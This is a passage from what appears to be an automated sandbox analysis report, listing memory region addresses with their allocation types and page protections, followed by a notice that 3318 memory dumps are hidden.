A7E59FF000
stack
page read and write
507D000
trusted library allocation
page read and write
8CC0000
trusted library allocation
page read and write
7DD0000
unkown
page read and write
7DD0000
trusted library allocation
page read and write
8E15000
trusted library allocation
page read and write
1A32C301000
trusted library allocation
page read and write
9C80000
trusted library allocation
page read and write
4E0000
heap
page read and write
8D80000
trusted library allocation
page read and write
1A32B5F0000
heap
page read and write
7DD0000
trusted library allocation
page read and write
7F0000
trusted library allocation
page read and write
501F000
stack
page read and write
23D0000
heap
page read and write
9FC000
stack
page read and write
AB40000
trusted library allocation
page read and write
6F10000
trusted library allocation
page read and write
6B60000
trusted library allocation
page read and write
DD0000
trusted library allocation
page readonly
6D4000
heap
page read and write
9030000
trusted library allocation
page read and write
8F75000
unkown
page read and write
AB20000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
9CF0000
trusted library allocation
page read and write
9C30000
trusted library allocation
page read and write
AB40000
trusted library allocation
page read and write
AB70000
trusted library allocation
page read and write
50DF000
stack
page read and write
8FC0000
trusted library allocation
page read and write
438A000
unkown
page readonly
8DA0000
trusted library allocation
page read and write
1A32B88D000
heap
page read and write
2CA3A1C0000
trusted library allocation
page read and write
7D6000
direct allocation
page read and write
9CF0000
trusted library allocation
page read and write
32A4000
heap
page read and write
5659000
trusted library allocation
page read and write
8E80000
trusted library allocation
page read and write
ABB0000
trusted library allocation
page read and write
6CE0000
trusted library allocation
page read and write
8CE0000
trusted library allocation
page read and write
9CB0000
trusted library allocation
page read and write
53A0000
heap
page read and write
1A32C8D0000
trusted library section
page readonly
9CC0000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
8DE0000
trusted library allocation
page read and write
B4BD000
trusted library allocation
page read and write
8F30000
trusted library allocation
page read and write
9030000
trusted library allocation
page read and write
7366000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
73A0000
trusted library allocation
page read and write
8F30000
trusted library allocation
page read and write
4B0000
heap
page read and write
6E20000
trusted library allocation
page read and write
AB30000
trusted library allocation
page read and write
6B90000
trusted library allocation
page read and write
5617000
trusted library allocation
page read and write
8CE0000
trusted library allocation
page read and write
1A330F50000
remote allocation
page read and write
C11000
heap
page read and write
893E000
stack
page read and write
AB20000
trusted library allocation
page read and write
8E50000
trusted library allocation
page read and write
AB40000
trusted library allocation
page read and write
CDE000
stack
page read and write
9C60000
trusted library allocation
page read and write
125FCA29000
heap
page read and write
9CB0000
trusted library allocation
page read and write
9CB0000
trusted library allocation
page read and write
8E00000
trusted library allocation
page read and write
8DA0000
trusted library allocation
page read and write
AFFA000
trusted library allocation
page read and write
8CE0000
unkown
page read and write
7DC4000
trusted library allocation
page read and write
BCE000
stack
page read and write
8CB5000
trusted library allocation
page read and write
8C70000
trusted library allocation
page read and write
3550000
heap
page read and write
There are 3318 hidden memdumps, click here to show them.